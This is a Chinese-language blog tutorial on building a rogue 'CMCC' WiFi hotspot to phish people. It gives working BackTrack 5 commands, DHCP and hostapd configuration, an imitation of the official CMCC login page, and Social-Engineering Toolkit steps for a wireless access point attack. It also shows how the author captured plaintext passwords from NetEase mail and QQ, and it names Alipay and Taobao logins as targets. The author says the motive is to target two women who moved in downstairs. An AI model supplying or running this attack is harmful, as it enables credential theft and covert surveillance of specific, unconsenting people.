利用WIFI热点钓鱼

本来是楼下搬来了俩妹子做的钓鱼

群里朋友也想弄

由于群里的朋友大多是开发 没接触过网络安全这一面 我怕朋友们看不懂啊....

不会的问我吧

---------------------------

为了配合群友对网络安全的认识不到位 为了避免其不必要的事发生(群里朋友做开发的 对各大漏洞 xss linux肯定不懂的..) 我做了最简单(不好意思群友 我真不知道该怎么和你们解释..)的介绍

咱们以架设 假 CMCC 热点为例子

                                         注意:先架设 bt5的虚拟机

我们就想搭建一个免费的CMCC,让她们主动来输入手机号认证,岂不更好,下面是实施计划。

准备:无线网卡(随便任意一款  如果是笔记本自带的话也行 )、bt5(Linux操作系统)、钓鱼页面

 

一:插入无线网卡进入BT5,把网卡启动起来,给eth0配个ip

#ifconfig eth0 up 
#ifconfig wlan0 up 
#ifconfig eht0 192.168.10.2/24 

二:下面要安装dhcp和配置

#apt-get install dhcp3-server

        

 

# vi /etc/default/dhcp3-server 

INTERFACES="eth0" 修改为 INTERFACES="at0"


# vi /etc/dhcp3/dhcpd.conf

 把下面贴进去,或者改成自己想要分的网段。

default-lease-time 600; 
max-lease-time 7200; 
option subnet-mask 255.255.255.0; 
option broadcast-address 192.168.10.255; 
option routers 192.168.10.2; 
option domain-name-servers 192.168.10.1; 
option domain-name "www.metasploit.cn"; 
subnet 192.168.10.0 netmask 255.255.255.0 { 
range 192.168.10.10 192.168.10.100; 
} 

 如图

 

三:启动apache和配置钓鱼页面

# /etc/init.d/apache2 start 
# cd /var/www/    //进入网站目录,bt5里apache默认首页是index.html 
#vi index.html    //修改成自己的钓鱼页面,这里为了演示,我插入基础钓鱼 

BT5里面我安装的有XSS平台,这里的Ip要注意,要和刚才我们在dhcp配置文件里面分配的ip段同网段,否则别人连接进来,访问不了的;

当然如果你直接伪造成移动CMCC页面也行!

为了更好地效果 最好仿造 cmcc官方的认证页面

 

四:准备的差不多了,神器该派出来了

# cd /pentest/exploits/set/ 
# ./set 

这里选择第一个set>1

1)  Social-Engineering Attacks

下一步

这里选择第一个set>8

8) WirelessAccess Point Attack Vector

2013090819115743190.jpg

下一步

set:wireless>1 //选择1 启动

2013090819122771172.jpg

会提示让你编辑dhcp3-server这个文件。按Ctrl+x 直接退出就可以,因为之前我们编辑过了。

下一步

选择分配的Ip段

set:wireless>2

Enter the wireless network interface (ex. wlan0):wlan0 //选择wlan0

2013090819125527463.jpg


(忘记说一个,# vi /pentest/exploits/set/config/set_config.py 更改为自己想要的AP名字,我这里改成CMCC)

看看 搜索无线网络

连接AP不用输入密码

打开任意网站都会跳到我的钓鱼页面 

我做的页面很简陋

看看ping值 ping所有的 都是返回你的

 

使用HostAPd创建wifi热点(AP)

1.安装hostapd:
	
	

apt-get install hostapd

2.配置hostapd.conf
        这个文件里有大量配置信息,幸好我们一般能用到的就那几个(其中多数去掉注释,配置保持默认):
	
	


interface=wlan0               #分享wifi的无线网卡
bridge=br0  
driver=nl80211              #网卡驱动
ssid=xiao106347              #热点ssid
hw_mode=g  
channel=1
dtim_period=1  
rts_threshold=2347  
fragm_threshold=2346  
auth_algs=3  
wpa=1           #加密类型wpa2
wpa_passphrase=12345678                #热点密钥
wpa_key_mgmt=WPA-PSK  
wpa_pairwise=TKIP CCMP  
rsn_pairwise=CCMP 


3.安装bridge-utils搭建网桥

	
	


apt-get install bridge-utils  
brctl adbr br0  
ifconfig br0 192.168.2.236 netmask 255.255.255.0 
route add default gw 192.168.2.254
brctl addif br0 eth0
brctl addif br0 wlan0 


4.开启热点
	
	

hostapd /file/hostapd.conf

也可以将3和4的命令保存为一个简单脚本:

这样后 手机验证后链接上 就可以上网了

 

然后就等着鱼儿上钩吧!

手机上测试了下,连接上热点登陆网易邮箱直接明文密码:

在手机上测试上百度使用了加密:

然后测试了 QQ

发现QQ返回的是明文密码..

也就是说  你拿到了密码

--看看用户都登陆什么网站 干了什么 然后还劫持了的登陆的账号密码 如果用户登陆支付宝 淘宝 啥的........

这个..

信息都在里面包含着

-----

这个教程考虑到大家会看不懂

我有时间了 出个视频教程 最详细地

包括虚拟机搭建 linux最基本使用什么的

-----

别拿去祸害人

我只是为了钓妹子..

 

 

 

 

本博客所有文章如无特别注明均为原创。作者:封笔尘缘复制或转载请以超链接形式注明转自 封笔尘缘
原文地址《利用WIFI热点钓鱼
分享到:更多

相关推荐

网友评论(1)

虽然看不懂 貌似很牛逼 希望站长可以出个详细点的视频教程.
菜鸟 5年前 (2014-09-26) 回复